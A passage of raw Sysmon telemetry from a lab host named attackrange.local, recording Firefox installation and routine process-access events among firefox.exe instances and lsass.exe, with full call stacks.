Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1216761|C:\Program Files\Mozilla Firefox\xul.dll+2bd81dd|C:\Program Files\Mozilla Firefox\xul.dll+2bd0ec9|C:\Program Files\Mozilla Firefox\xul.dll+2ba9755|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+275993|C:\Program Files\Mozilla Firefox\xul.dll+4c069a|C:\Program Files\Mozilla Firefox\xul.dll+1bf9921 10341000x800000000000000016752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f 10341000x800000000000000016739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2ba9421|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+275993|C:\Program Files\Mozilla Firefox\xul.dll+4c069a 10341000x800000000000000016738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+2ba9393|C:\Program Files\Mozilla Firefox\xul.dll+2ba8a20|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+275993|C:\Program Files\Mozilla Firefox\xul.dll+4c069a|C:\Program Files\Mozilla Firefox\xul.dll+1bf9921|C:\Program Files\Mozilla Firefox\xul.dll+2342d8 534500x800000000000000016737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-944E-6005-2105-00000000A301}5772C:\Users\Administrator\Downloads\Firefox Installer.exe 534500x800000000000000016736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.302{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe 10341000x800000000000000016735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.114{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:57.114{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla 